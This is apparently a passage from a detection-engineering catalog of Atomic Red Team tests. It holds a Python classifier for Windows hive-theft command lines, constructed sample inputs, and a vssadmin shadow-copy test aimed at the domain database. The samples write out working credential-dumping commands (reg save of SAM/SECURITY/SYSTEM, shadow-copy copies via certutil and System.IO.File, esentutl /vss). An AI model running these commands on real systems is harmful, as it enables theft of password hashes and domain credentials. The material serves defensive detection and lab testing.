Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
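A classifier for the hive-theft command lines above, as an added example (my code, not from Atomic Red Team or this catalog): it takes the raw text of a process-creation event (Sysmon Event ID 1 or Security 4688 CommandLine) or a PowerShell script block (Event ID 4104) and returns which pattern it matches: reg save or reg export of SAM, SECURITY or SYSTEM (with HKLM and HKEY_LOCAL_MACHINE treated alike), a copy out of a volume shadow copy via the \\?\GLOBALROOT device path used by the certutil and System.IO.File tests, or esentutl /vss against a file under System32\config. The sample inputs are constructed. The System.IO.File and WinPwn variants run inside powershell.exe, so their process command line shows nothing; feed the 4104 script block text instead.

```python
"""Classify hive-theft command lines (the SAM/SECURITY/SYSTEM tests above).

Added example, not Atomic Red Team code. Input is the raw CommandLine of a
process-creation event (Sysmon EID 1 / Security 4688) or a PowerShell script
block (EID 4104). Sample inputs are constructed.
"""
import re

HIVES = {"sam", "security", "system"}
ROOT_ALIASES = {"hkey_local_machine": "hklm", "hklm": "hklm"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\<hive>
VSS_PATH_RE = re.compile(
    r"\\\\\?\\globalroot\\device\\harddiskvolumeshadowcopy\d+"
    r"\\windows\\system32\\config\\(sam|security|system)\b", re.I)
CONFIG_HIVE_RE = re.compile(r"\\system32\\config\\(sam|security|system)\b", re.I)


def tokens(text):
    """Split a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in TOKEN_RE.findall(text)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hive_from_regkey(key):
    r"""'HKLM\sam' or 'HKEY_LOCAL_MACHINE\SECURITY' -> hive name; subkeys -> None."""
    parts = key.strip("\\").split("\\")
    if len(parts) != 2:
        return None
    root, hive = ROOT_ALIASES.get(parts[0].lower()), parts[1].lower()
    return hive if root == "hklm" and hive in HIVES else None


def classify(text):
    """Return (rule, hive) for a hive-theft pattern, or None."""
    toks = tokens(text)
    exe = basename(toks[0]) if toks else ""
    if exe in ("reg", "reg.exe") and len(toks) >= 3 and toks[1].lower() in ("save", "export"):
        hive = hive_from_regkey(toks[2])
        if hive:
            return (f"reg-{toks[1].lower()}", hive)
    m = VSS_PATH_RE.search(text)
    if m:
        return ("vss-hive-copy", m.group(1).lower())
    if exe in ("esentutl", "esentutl.exe") and any(t.lower() == "/vss" for t in toks):
        m = CONFIG_HIVE_RE.search(text)
        if m:
            return ("esentutl-vss-copy", m.group(1).lower())
    return None


SAMPLE_INPUTS = [  # constructed
    r"reg save HKLM\sam C:\Users\lab\AppData\Local\Temp\sam",
    r'reg.exe export "HKEY_LOCAL_MACHINE\SECURITY" C:\Users\lab\AppData\Local\Temp\security',
    # Subkey backup by an administrator: not a hive root, left alone.
    r'"C:\Windows\System32\reg.exe" save HKLM\SYSTEM\CurrentControlSet\Services\Spooler C:\backup\spooler.hiv',
    # One iteration of the certutil loop, as it appears in a process-creation event.
    r'certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM" C:\Users\lab\AppData\Local\Temp\SAMvss1 2',
    # Script block text (EID 4104) from the System.IO.File variant.
    r'[System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM", "$env:TEMP\SYSTEMvss2", $true)',
    r"esentutl.exe /y /vss C:\Windows\System32\config\SAM /d C:\Users\Public\sam.bak",
    # Unrelated export: wrong root, not a hive.
    r"reg export HKCU\Software\Contoso C:\Users\lab\contoso.reg",
]


def run_sample():
    return [classify(s) for s in SAMPLE_INPUTS]


if __name__ == "__main__":
    for text, result in zip(SAMPLE_INPUTS, run_sample()):
        print(f"{str(result):32} {text[:70]}")
```

A reg save of a subkey (the Spooler example) is deliberately left alone: administrators back up subkeys routinely, and only the three hive roots are interesting. The shadow-copy rule matches the device path wherever it appears, so it also covers the file-copy tools you have not thought of yet, provided the path reaches your logs.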
Create Volume Shadow Copy with vssadmin · T1003.003 NTDS · Credential Access · command_prompt · needs admin · windows · 24 detection rules
This test is intended to be run on a Domain Controller. The Active Directory database NTDS.dit is locked while the directory service is running, so it is typically dumped by copying it from a Volume Shadow Copy; this test creates that shadow copy.
vssadmin.exe create shadow /for=#{drive_letter}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.